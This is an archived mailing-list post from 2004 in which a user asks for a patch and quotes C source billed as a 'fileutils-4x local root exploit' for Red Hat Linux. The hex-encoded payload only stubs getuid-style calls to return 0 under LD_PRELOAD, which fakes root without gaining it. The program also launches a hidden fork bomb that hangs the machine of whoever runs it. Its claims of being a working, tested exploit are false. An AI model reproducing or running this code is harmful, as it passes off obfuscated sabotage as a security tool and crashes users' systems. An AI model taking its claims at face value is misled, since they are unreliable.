[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Linux X86 fileutils-4x local root exploit
|
From: |
Antti J Hätinen |
|
Subject: |
Linux X86 fileutils-4x local root exploit |
|
Date: |
Sat, 19 Jun 2004 17:20:41 +0300 |
Hi!
Is there a patch against this exploit?
/* !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE
*
* lsroot.c Linux X86 fileutils-4x local root exploit
*
* Tested under:
*
* Redhat 7.0 fileutils-4.0x-3
* Redhat 7.1 fileutils-4.0.36-4
* Redhat 7.2 fileutils-4.1-4
* Redhat 7.3 fileutils-4.1-10
*
* jason <address@hidden>
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char hellc0de[] =
"\x69\x6e\x74\x20\x67\x65\x74\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65"
"\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74"
"\x65\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30"
"\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74\x67\x69\x64\x28\x29\x20"
"\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74"
"\x20\x67\x65\x74\x65\x67\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75"
"\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x0/bin/sh";
int main()
{
FILE *fp;
char *offset;
fp=fopen("/tmp/own.c","w");
fprintf(fp,"%s",hellc0de);
fclose(fp);
system("gcc -shared -o /tmp/own.so /tmp/own.c;rm -f
/tmp/own.c");
if (fork() == 0) {
sleep(10); while (1) { fork(); offset=malloc(512); }
exit(0);
}
system("LD_PRELOAD=/tmp/own.so /bin/sh");
return 0;
}
/* -EOF- */
- Linux X86 fileutils-4x local root exploit,
Antti J Hätinen <=